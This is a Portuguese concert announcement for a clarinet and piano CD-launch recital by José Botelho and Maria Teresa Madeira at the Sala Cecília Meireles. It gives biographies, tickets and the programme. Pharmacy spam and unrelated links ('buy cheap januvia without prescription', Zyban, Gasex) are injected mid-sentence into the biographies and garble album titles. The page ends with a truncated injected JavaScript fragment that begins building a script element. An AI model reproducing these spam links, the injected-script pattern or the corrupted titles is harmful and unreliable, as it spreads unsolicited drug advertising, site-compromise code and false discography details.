CD/DVDMúsica de câmaraProgramaçãoRio de Janeiro

Recital de clarineta e piano para lançamento de CD

José Botelho e Maria Teresa Madeira lançam CD no Espaço Guiomar Novaes.

 

O clarinetista José Botelho e a pianista Maria Teresa Madeira se apresentam na Sala Guiomar Novaes, da Sala Cecília Meireles, no Rio de Janeiro, na terça-feira, dia 24 de março, às 12h30 e 18h30, no lançamento do CD José Botelho e amigos.

O concerto, que integra a série Recitais de Guiomar, conta, no programa, com obras de Cesar Guerra-Peixe (4 Coisas), Carlos Gomes (Ária), Ernesto Nazareth (Batuque Purchase , para piano) e Giacomo Rossini (Introdução / Tema com Variações), entre outros.

Sobre os artistas:

O clarinetista José Botelho possui mais de 60 anos de carreira, durante os quais já tocou na Orquestra Sinfônica Brasileira, Orquestras do Theatro Municipal do Rio de Janeiro, de São Paulo, de Campinas, de Blumenau, do Porto e de Lisboa.

Professor aposentado da Uni-Rio, egresso do Conservatório de Música do Porto, Botelho é apontado como o mais atuante em seu instrumento ao longo do século 20 no Rio de Janeiro. Sua importância como instrumentista confirma-se pelo fato de vários compositores, como José Siqueira, Francisco Mignone, Osvaldo Lacerda, Camargo Guarnieri e Guerra-Peixe, terem-lhe dedicado algumas das suas obras.

Sua discografia é composta por mais de 38 discos, entre os quais vale destacar: 10 anos depois (MPB-4), A Orquestra Sinfônica Nacional interpreta Mignone e Gnattali (Orquestra Sinfônica Nacional), Bem bom (Gal Costa), Caminhos do coração (Luiz Gonzaga Junior), Clareando (Francis Hime), where yo buy zovirac Clube da Esquina 2 (Milton Nascimento), Dori Caymmi 1982 (Dori Caymmi), O Grande Circo Místico http://www.locksafeandvaultja.com/2018/02/02/flower-delivery-artane/ http://www.trogirciovo.eu/zyban-price-new-zealand/ buy cheap januvia without prescription (Edu Lobo e Chico Buarque), Talismã (Maria Bethânia) e Vida (Chico Buarque).

 

Maria Teresa Madeira é bacharel em piano pela Escola de Música da UFRJ e mestre em Música pela Universidade de Iowa, nos EUA. Já atuou, como solista, com grupos como Orquestra Sinfônica Brasileira, Petrobras Pró-Música, Sinfônica Nacional da UFF, Sinfônica da Escola de Música da UFRJ, Orquestra Sinfônica da Universidade Federal de Mato Grosso, de Câmara do Conservatório Brasileiro de Música, Cedar Rapids Symphony, University of Iowa Chamber Orchestra, Banda Sinfônica da Cidade de Córdoba (Argentina), Banda Sinfônica da Faculdade de Música do Espírito Santo (Fames), e sob a regência de nomes como Isaac Karabtchevsky, Aylton Escobar, David Machado, Roberto Duarte, Ligia Amadio, Florentino Dias, Armando Prazeres, Ricardo Rocha, Fabrício Carvalho, Christin Tyinmeyer, Andrée Dagenais, Roberto Farias e Gilson Silva.

Dentre as principais premiações que recebeu, vale destacar o Prêmio Carlos Gomes de melhor pianista de 2002, a indicação ao Grammy Latino de 2003 de melhor CD de música erudita com o trabalho Purchase http://petroguia.com.br/cheap-gasex-ingredients/ Ernesto Nazareth Pills ; e o Prêmio TIM (2007) como melhor disco de música instrumental, com o CD Radamés e o sax, gravado com Léo Gandelman e o Novo Quinteto.

 

SERVIÇO:

Recital de lançamento do CD “José Botelho e amigos”

José Botelho, clarineta

Maria Teresa Madeira, piano

 

24 de março, terça-feira, às 12h30 e 18h30

Espaço Guiomar Novaes – Sala Cecília Meireles (R. da Lapa 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

 

Ingressos a R$ 10 (inteira). Estudantes de música pagam R$ 1

 

Programa: 

4 Coisas (Cesar Guerra-Peixe)

Ária (Antonio Carlos Gomes)

Ondas (Luis Fernando da Silva)

Solo de Concours (Henri Rabaud)

Batuque (piano solo) (Ernesto Nazareth)

Introdução / Tema com Variações (Cadência de José Botelho) (Gioachino Rossini)

var d=document;var s=d.createElement(‘script’);